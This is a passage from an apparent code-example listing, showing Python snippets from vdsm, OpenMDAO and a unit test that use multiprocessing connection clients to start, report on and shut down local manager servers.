            manager.register('instance', callable=_SuperVdsm)

            server = manager.get_server()
            server_thread = concurrent.thread(server.serve_forever)
            server_thread.start()

            chown(address, args.user, args.group)

            if args.enable_network:
                init_privileged_network_components()

            log.debug("Started serving super vdsm object")

            while _running:
                sigutils.wait_for_signal()

            log.debug("Terminated normally")
        finally:
            try:
                with connection.Client(address, authkey=_AUTHKEY) as conn:
                    server.shutdown(conn)
                server_thread.join()
            except Exception:
                # We ignore any errors here to avoid a situation where systemd
                # restarts supervdsmd just at the end of shutdown stage. We're
                # prepared to handle any mess (like existing outdated socket
                # file) in the startup stage.
                log.exception("Error while shutting down supervdsm")

    except Exception as e:
        syslog.syslog("Supervdsm failed to start: %s" % e)
        # Make it easy to debug via the shell
        raise
Example #29
def main():  #pragma no cover
    """
    Code which runs a host manager.
    Expects configuration data from parent on `stdin`.
    Replies with address and optionally public key.
    The environment variable ``OPENMDAO_KEEPDIRS`` can be used to avoid
    removal of the temporary directory used here.
    """
    sys.stdout = open('stdout', 'w')
    sys.stderr = open('stderr', 'w')

    #    util.log_to_stderr(logging.DEBUG)
    # Avoid root possibly masking us.
    logging.getLogger().setLevel(logging.DEBUG)

    import platform
    hostname = platform.node()
    pid = os.getpid()
    ident = '(%s:%d)' % (hostname, pid)
    print '%s main startup' % ident
    sys.stdout.flush()

    # Get data from parent over stdin.
    data = cPickle.load(sys.stdin)
    sys.stdin.close()
    print '%s data received' % ident

    authkey = data['authkey']
    allow_shell = data['allow_shell']
    allowed_users = data['allowed_users']
    print '%s using %s authentication' % (ident, keytype(authkey))
    if allowed_users is None:
        print '%s allowed_users: ANY' % ident
    else:
        print '%s allowed_users: %s' % (ident, sorted(allowed_users.keys()))
    if allow_shell:
        print '%s ALLOWING SHELL ACCESS' % ident
    sys.stdout.flush()
    log_level = data['dist_log_level']
    os.environ['OPENMDAO_KEEPDIRS'] = data['keep_dirs']

    exc = None
    server = None
    try:
        # Update HostManager registry.
        dct = data['registry']
        print '%s registry:' % ident
        for name in dct.keys():
            module = dct[name]
            print '    %s: %s' % (name, module)
            mod = __import__(module, fromlist=name)
            cls = getattr(mod, name)
            register(cls, HostManager)

        # Set some stuff.
        print '%s preparing to fork, log level %d' % (ident, log_level)
        sys.stdout.flush()
        util.get_logger().setLevel(log_level)
        forking.prepare(data)

        # Create Server for a HostManager object.
        name = '%d[%d]' % (data['index'], pid)
        logging.getLogger(name).setLevel(log_level)
        server = OpenMDAO_Server(HostManager._registry, (hostname, 0),
                                 authkey,
                                 'pickle',
                                 name=name,
                                 allowed_users=allowed_users,
                                 allowed_hosts=[data['parent_address'][0]])
    except Exception as exc:
        print '%s caught exception: %s' % (ident, exc)

    # Report server address and public key back to parent.
    print '%s connecting to parent at %s' % (ident, data['parent_address'])
    sys.stdout.flush()
    conn = connection.Client(data['parent_address'], authkey=authkey)
    if exc:
        conn.send((data['index'], None, str(exc)))
    else:
        conn.send((data['index'], server.address, server.public_key_text))
    conn.close()

    if exc:
        print '%s exiting' % ident
        sys.exit(1)

    # Set name etc.
    current_process()._server = server
    current_process()._name = 'Host-%s:%s' % server.address
    current_process().authkey = authkey
    logging.getLogger(current_process()._name).setLevel(log_level)
    util._run_after_forkers()

    # Register a cleanup function.
    def cleanup(directory):
        keep_dirs = int(os.environ.get('OPENMDAO_KEEPDIRS', '0'))
        if not keep_dirs and os.path.exists(directory):
            print '%s removing directory %s' % (ident, directory)
            shutil.rmtree(directory)
        print '%s shutting down host manager' % ident

    util.Finalize(None, cleanup, args=[data['dir']], exitpriority=0)

    # Start host manager.
    print '%s remote host manager starting in %s' % (ident, data['dir'])
    sys.stdout.flush()
    server.serve_forever()
Example #30
 def testAbortedConnection(self):
     """Tests that a closed connection doesn't crash the service."""
     with self.run_service():
         client = connection.Client(self.address)
         client.close()
         self.assertTrue(self._pool_is_healthy())